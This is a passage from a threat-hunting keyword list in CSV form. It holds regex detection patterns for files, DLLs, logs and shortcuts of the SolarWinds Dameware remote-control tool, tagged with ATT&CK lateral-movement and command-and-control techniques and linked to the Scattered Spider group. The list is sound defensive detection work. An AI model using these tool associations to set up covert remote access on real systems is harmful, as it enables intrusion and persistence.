Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWMSISET.W32*",".{0,1000}\\DWMSISET\.W32.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWMSISET.X64*",".{0,1000}\\DWMSISET\.X64.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWNativeWCFClient.dll*",".{0,1000}\\DWNativeWCFClient\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWNativeWCFClientRES.dll*",".{0,1000}\\DWNativeWCFClientRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWPing.dll*",".{0,1000}\\DWPing\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWPINGRES.dll*",".{0,1000}\\DWPINGRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCBA.dll*",".{0,1000}\\DWRCBA\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCBN.dll*",".{0,1000}\\DWRCBN\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" 
"*\DWRCC.chm*",".{0,1000}\\DWRCC\.chm.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCC.exe*",".{0,1000}\\DWRCC\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCC.log*",".{0,1000}\\DWRCC\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCC.log*",".{0,1000}\\DWRCC\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\DWRCC.Logging.xml*",".{0,1000}\\DWRCC\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCCH.dll*",".{0,1000}\\DWRCCH\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCChat.dll*",".{0,1000}\\DWRCChat\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCChatRES.dll*",".{0,1000}\\DWRCChatRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCCMD.exe*",".{0,1000}\\DWRCCMD\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCCRES.dll*",".{0,1000}\\DWRCCRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCCSFTv2.data*",".{0,1000}\\DWRCCSFTv2\.data.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" 
"*\DWRCD.dll*",".{0,1000}\\DWRCD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCD.dll*",".{0,1000}\\DWRCD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCK.dll*",".{0,1000}\\DWRCK\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCOP.dll*",".{0,1000}\\DWRCOP\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCOPRES.dll*",".{0,1000}\\DWRCOPRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCPN.dll*",".{0,1000}\\DWRCPN\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCRSA.dll*",".{0,1000}\\DWRCRSA\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCRSS.dll*",".{0,1000}\\DWRCRSS\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCRSS.dll*",".{0,1000}\\DWRCRSS\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCS.exe*",".{0,1000}\\DWRCS\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCS.Logging.xml*",".{0,1000}\\DWRCS\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" 
"*\DWRCS.reg*",".{0,1000}\\DWRCS\.reg.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\DWRCSET.dll*",".{0,1000}\\DWRCSET\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSETRES.dll*",".{0,1000}\\DWRCSETRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSh.dll*",".{0,1000}\\DWRCSh\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSHRegister.cmd*",".{0,1000}\\DWRCSHRegister\.cmd.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSI.dll*",".{0,1000}\\DWRCSI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSI.dll*",".{0,1000}\\DWRCSI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSIRES.dll*",".{0,1000}\\DWRCSIRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSMSI.exe*",".{0,1000}\\DWRCSMSI\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSMSIRES.dll*",".{0,1000}\\DWRCSMSIRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSPC.exe*",".{0,1000}\\DWRCSPC\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" 
"*\DWRCSPCRES.dll*",".{0,1000}\\DWRCSPCRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSPX.exe*",".{0,1000}\\DWRCSPX\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSPXRES.dll*",".{0,1000}\\DWRCSPXRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSRES.dll*",".{0,1000}\\DWRCSRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCST.exe*",".{0,1000}\\DWRCST\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCST.Logging.xml*",".{0,1000}\\DWRCST\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCSTRES.dll*",".{0,1000}\\DWRCSTRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCU3.dll*",".{0,1000}\\DWRCU3\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCWHD.Logging.xml*",".{0,1000}\\DWRCWHD\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCWHDAPI.dll*",".{0,1000}\\DWRCWHDAPI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCWHDUI.dll*",".{0,1000}\\DWRCWHDUI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" 
"*\DWRCWHDUIRES.dll*",".{0,1000}\\DWRCWHDUIRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCWol.dll*",".{0,1000}\\DWRCWol\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRCWXL.dll*",".{0,1000}\\DWRCWXL\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRTD.dll*",".{0,1000}\\DWRTD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRTDE.exe*",".{0,1000}\\DWRTDE\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRTDR.dll*",".{0,1000}\\DWRTDR\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWRTDR.dll*",".{0,1000}\\DWRTDR\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWSGRWRP.dll*",".{0,1000}\\DWSGRWRP\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWUtil.dll*",".{0,1000}\\DWUtil\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWWFDS.dll*",".{0,1000}\\DWWFDS\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\enable dameware remote everywhere agent.lnk*",".{0,1000}\\enable\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\eventlog\application\dameware 
*",".{0,1000}\\eventlog\\application\\dameware\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\getsupportservice_common_dameware*",".{0,1000}\\getsupportservice_common_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\getsupportservice_dameware*",".{0,1000}\\getsupportservice_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\getsupportservice_dameware\*",".{0,1000}\\getsupportservice_dameware\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\linuxconsole_dw (1).zip*",".{0,1000}\\linuxconsole_dw\s\(1\)\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\logs\baseclient_*.log*",".{0,1000}\\logs\\baseclient_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\logs\baseconsoleapp_*.log*",".{0,1000}\\logs\\baseconsoleapp_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\logs\basupclphlp_*.log*",".{0,1000}\\logs\\basupclphlp_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Logs\DNTU.log*",".{0,1000}\\Logs\\DNTU\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control Client Agent MSI Builder.lnk*",".{0,1000}\\Mini\sRemote\sControl\sClient\sAgent\sMSI\sBuilder\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control Diagnostics.lnk*",".{0,1000}\\Mini\sRemote\sControl\sDiagnostics\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote 
Control","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control Help.lnk*",".{0,1000}\\Mini\sRemote\sControl\sHelp\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control Log Adjuster.lnk*",".{0,1000}\\Mini\sRemote\sControl\sLog\sAdjuster\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control Service*",".{0,1000}\\Mini\sRemote\sControl\sService.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote 